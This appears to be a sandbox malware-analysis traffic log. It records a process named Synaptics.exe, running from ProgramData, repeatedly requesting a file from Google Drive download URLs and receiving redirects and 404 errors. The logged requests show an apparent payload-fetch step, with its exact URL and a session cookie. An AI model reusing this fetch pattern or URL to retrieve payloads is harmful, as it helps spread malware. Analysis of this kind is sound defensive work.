                                                                                                                                                                2024-12-25 08:08:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC5G0AM4hUSJeI6h3e2L7oWK-D2wJcZ-3KJu4sjfmC5ol39mQ4N3dgPQjsP0uQdfLNOJ94Zog5k
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:29 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fiO4YhprWCb9ItcHu0vU8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                2024-12-25 08:08:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 43 48 71 6f 76 44 62 34 57 4b 6d 32 47 72 44 4f 43 48 68 55 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="lCHqovDb4WKm2GrDOCHhUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:08:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                52192.168.2.449980142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                53192.168.2.449998142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC7OgGrtJyLz_nvUtQ3y97wxkGnIvqplsCqMB_BI57gpw1MPEq-rDhLhsw18LbPGhyik
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:31 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-bP9JUtOrZbkyrIFlxoeDgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 6a 2d 73 4b 5f 6b 61 48 6c 4b 65 6e 6f 74 37 58 72 50 45 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="Sj-sK_kaHlKenot7XrPEdg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                54192.168.2.450000142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6u-0oQpt31XDUPCt26kfr5onLFzZWnLLjXeHFmgGub9Lqr0kjLHmEL43DnK7FnA4bB
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:32 GMT
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-4KbNiu16GpxBN4soZuVXWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 6b 74 68 42 65 70 79 63 6d 53 56 72 69 7a 61 32 4b 4d 68 52 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="JkthBepycmSVriza2KMhRw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                55192.168.2.450001142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:31 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-aLf-gpQQFlYPgsrxs6o2JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                56192.168.2.450002142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:31 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-mzYR1Cg6mzW-v3TuErnYOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                57192.168.2.450019142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:35 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-NhzHWqmIz7uD5PXw6r6VyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                58192.168.2.450020142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:35 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-26S-gQH1IAaevC95WvCLgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                59192.168.2.450036142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:08:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:40 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ivWJwAWjrgaYSMGNDnI90Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
